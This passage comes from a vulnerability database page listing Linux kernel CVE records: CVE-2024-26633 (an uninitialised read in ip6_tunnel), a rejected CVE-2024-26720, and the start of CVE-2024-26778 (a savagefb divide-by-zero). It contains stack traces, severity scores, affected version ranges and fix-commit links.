ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]
ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564
__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592
neigh_output include/net/neighbour.h:542 [inline]
ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137
ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222
NF_HOOK_COND include/linux/netfilter.h:303 [inline]
ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243
dst_output include/net/dst.h:451 [inline]
ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155
ip6_send_skb net/ipv6/ip6_output.c:1952 [inline]
ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972
rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582
rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920
inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendmsg net/socket.c:2676 [inline]
__se_sys_sendmsg net/socket.c:2674 [inline]
__x64_sys_sendmsg+0x307/0x490 net/socket.c:2674
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x44/0x110 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Uninit was created at:
slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768
slab_alloc_node mm/slub.c:3478 [inline]
__kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517
__do_kmalloc_node mm/slab_common.c:1006 [inline]
__kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027
kmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582
pskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098
__pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655
pskb_may_pull_reason include/linux/skbuff.h:2673 [inline]
pskb_may_pull include/linux/skbuff.h:2681 [inline]
ip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408
ipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]
ip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432
__netdev_start_xmit include/linux/netdevice.h:4940 [inline]
netdev_start_xmit include/linux/netdevice.h:4954 [inline]
xmit_one net/core/dev.c:3548 [inline]
dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564
__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
neigh_connected_output+0x569/0x660 net/core/neighbour.c:1592
neigh_output include/net/neighbour.h:542 [inline]
ip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137
ip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222
NF_HOOK_COND include/linux/netfilter.h:303 [inline]
ip6_output+0x323/0x610 net/ipv6/ip6_output.c:243
dst_output include/net/dst.h:451 [inline]
ip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155
ip6_send_skb net/ipv6/ip6_output.c:1952 [inline]
ip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972
rawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582
rawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920
inet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg net/socket.c:745 [inline]
____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendms
---truncated---
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: fbfa743a9d2a0ffa24251764f10afc13eb21e739 Version: a6f6bb6bc04a5f88a31f47a6123d3fbf5ee8d694 Version: 72bbf335e7aad09c88c50dbdd238f4faabd12174 Version: decccc92ee0a978a1c268b5df16824cb6384ed3c Version: d3d9b59ab32160e3cc4edcf7e5fa7cecb53a7d25 Version: d397f7035d2c754781bbe93b07b94d8cd898620c Version: 41e07a7e01d951cfd4c9a7dac90c921269d89513 Version: a7fe4e5d06338e1a82b1977eca37400951f99730 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26633",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-18T19:01:45.822242Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T17:13:27.539Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-12-20T13:06:42.426Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241220-0001/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "135414f300c5db995e2a2f3bf0f455de9d014aee",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "3f15ba3dc14e6ee002ea01b4faddc3d49200377c",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "da23bd709b46168f7dfc36055801011222b076cd",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "4329426cf6b8e22b798db2331c7ef1dd2a9c748d",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "62a1fedeb14c7ac0947ef33fadbabd35ed2400a2",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "687c5d52fe53e602e76826dbd4d7af412747e183",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "ba8d904c274268b18ef3dc11d3ca7b24a96cb087",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"lessThan": "d375b98e0248980681e5e56b712026174d617198",
"status": "affected",
"version": "fbfa743a9d2a0ffa24251764f10afc13eb21e739",
"versionType": "git"
},
{
"status": "affected",
"version": "a6f6bb6bc04a5f88a31f47a6123d3fbf5ee8d694",
"versionType": "git"
},
{
"status": "affected",
"version": "72bbf335e7aad09c88c50dbdd238f4faabd12174",
"versionType": "git"
},
{
"status": "affected",
"version": "decccc92ee0a978a1c268b5df16824cb6384ed3c",
"versionType": "git"
},
{
"status": "affected",
"version": "d3d9b59ab32160e3cc4edcf7e5fa7cecb53a7d25",
"versionType": "git"
},
{
"status": "affected",
"version": "d397f7035d2c754781bbe93b07b94d8cd898620c",
"versionType": "git"
},
{
"status": "affected",
"version": "41e07a7e01d951cfd4c9a7dac90c921269d89513",
"versionType": "git"
},
{
"status": "affected",
"version": "a7fe4e5d06338e1a82b1977eca37400951f99730",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/ip6_tunnel.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.2.87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.10.106",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.12.71",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.16.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.18.49",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.50",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()\n\nsyzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken.\n\nReading frag_off can only be done if we pulled enough bytes\nto skb-\u003ehead. Currently we might access garbage.\n\n[1]\nBUG: KMSAN: uninit-value in ip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0\nip6_tnl_parse_tlv_enc_lim+0x94f/0xbb0\nipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]\nip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432\n__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\nnetdev_start_xmit include/linux/netdevice.h:4954 [inline]\nxmit_one net/core/dev.c:3548 [inline]\ndev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\nneigh_connected_output+0x569/0x660 net/core/neighbour.c:1592\nneigh_output include/net/neighbour.h:542 [inline]\nip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137\nip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222\nNF_HOOK_COND include/linux/netfilter.h:303 [inline]\nip6_output+0x323/0x610 net/ipv6/ip6_output.c:243\ndst_output include/net/dst.h:451 [inline]\nip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155\nip6_send_skb net/ipv6/ip6_output.c:1952 [inline]\nip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972\nrawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582\nrawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920\ninet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg net/socket.c:745 [inline]\n____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n__sys_sendmsg net/socket.c:2667 [inline]\n__do_sys_sendmsg net/socket.c:2676 [inline]\n__se_sys_sendmsg net/socket.c:2674 [inline]\n__x64_sys_sendmsg+0x307/0x490 net/socket.c:2674\ndo_syscall_x64 arch/x86/entry/common.c:52 [inline]\ndo_syscall_64+0x44/0x110 arch/x86/entry/common.c:83\nentry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\nslab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\nslab_alloc_node mm/slub.c:3478 [inline]\n__kmem_cache_alloc_node+0x5c9/0x970 mm/slub.c:3517\n__do_kmalloc_node mm/slab_common.c:1006 [inline]\n__kmalloc_node_track_caller+0x118/0x3c0 mm/slab_common.c:1027\nkmalloc_reserve+0x249/0x4a0 net/core/skbuff.c:582\npskb_expand_head+0x226/0x1a00 net/core/skbuff.c:2098\n__pskb_pull_tail+0x13b/0x2310 net/core/skbuff.c:2655\npskb_may_pull_reason include/linux/skbuff.h:2673 [inline]\npskb_may_pull include/linux/skbuff.h:2681 [inline]\nip6_tnl_parse_tlv_enc_lim+0x901/0xbb0 net/ipv6/ip6_tunnel.c:408\nipxip6_tnl_xmit net/ipv6/ip6_tunnel.c:1326 [inline]\nip6_tnl_start_xmit+0xab2/0x1a70 net/ipv6/ip6_tunnel.c:1432\n__netdev_start_xmit include/linux/netdevice.h:4940 [inline]\nnetdev_start_xmit include/linux/netdevice.h:4954 [inline]\nxmit_one net/core/dev.c:3548 [inline]\ndev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n__dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\ndev_queue_xmit include/linux/netdevice.h:3134 [inline]\nneigh_connected_output+0x569/0x660 net/core/neighbour.c:1592\nneigh_output include/net/neighbour.h:542 [inline]\nip6_finish_output2+0x23a9/0x2b30 net/ipv6/ip6_output.c:137\nip6_finish_output+0x855/0x12b0 net/ipv6/ip6_output.c:222\nNF_HOOK_COND include/linux/netfilter.h:303 [inline]\nip6_output+0x323/0x610 net/ipv6/ip6_output.c:243\ndst_output include/net/dst.h:451 [inline]\nip6_local_out+0xe9/0x140 net/ipv6/output_core.c:155\nip6_send_skb net/ipv6/ip6_output.c:1952 [inline]\nip6_push_pending_frames+0x1f9/0x560 net/ipv6/ip6_output.c:1972\nrawv6_push_pending_frames+0xbe8/0xdf0 net/ipv6/raw.c:582\nrawv6_sendmsg+0x2b66/0x2e70 net/ipv6/raw.c:920\ninet_sendmsg+0x105/0x190 net/ipv4/af_inet.c:847\nsock_sendmsg_nosec net/socket.c:730 [inline]\n__sock_sendmsg net/socket.c:745 [inline]\n____sys_sendmsg+0x9c2/0xd60 net/socket.c:2584\n___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n__sys_sendmsg net/socket.c:2667 [inline]\n__do_sys_sendms\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:18.313Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee"
},
{
"url": "https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c"
},
{
"url": "https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd"
},
{
"url": "https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d"
},
{
"url": "https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2"
},
{
"url": "https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183"
},
{
"url": "https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087"
},
{
"url": "https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198"
}
],
"title": "ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26633",
"datePublished": "2024-03-18T10:07:49.468Z",
"dateReserved": "2024-02-19T14:20:24.136Z",
"dateUpdated": "2025-05-04T12:54:18.313Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26720 (GCVE-0-2024-26720)
Vulnerability from cvelistv5
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2024-12-19T11:15:27.766Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"rejectedReasons": [
{
"lang": "en",
"value": "This CVE ID has been rejected or withdrawn by its CVE Numbering Authority."
}
]
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26720",
"datePublished": "2024-04-03T14:55:20.286Z",
"dateRejected": "2024-12-19T11:15:27.766Z",
"dateReserved": "2024-02-19T14:20:24.161Z",
"dateUpdated": "2024-12-19T11:15:27.766Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26778 (GCVE-0-2024-26778)
Vulnerability from cvelistv5
Published
2024-04-03 17:01
Modified
2025-05-04 08:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fbdev: savage: Error out if pixclock equals zero
The userspace program could pass any values to the driver through
ioctl() interface. If the driver doesn't check the value of pixclock,
it may cause divide-by-zero error.
Although pixclock is checked in savagefb_decode_var(), but it is not
checked properly in savagefb_probe(). Fix this by checking whether
pixclock is zero in the function savagefb_check_var() before
info->var.pixclock is used as the divisor.
This is similar to CVE-2022-3061 in i740fb which was fixed by
commit 15cf0b8.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26778",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:06:44.068367Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T16:06:55.000Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.314Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/224453de8505aede1890f007be973925a3edf6a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/512ee6d6041e007ef5bf200c6e388e172a2c5b24"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/070398d32c5f3ab0e890374904ad94551c76aec4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc3c2e58d73b28b9a8789fca84778ee165a72d13"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9ca4e80d23474f90841251f4ac0d941fa337a01"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/video/fbdev/savage/savagefb_driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "224453de8505aede1890f007be973925a3edf6a1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "512ee6d6041e007ef5bf200c6e388e172a2c5b24",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "070398d32c5f3ab0e890374904ad94551c76aec4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bc3c2e58d73b28b9a8789fca84778ee165a72d13",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a9ca4e80d23474f90841251f4ac0d941fa337a01",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/video/fbdev/savage/savagefb_driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
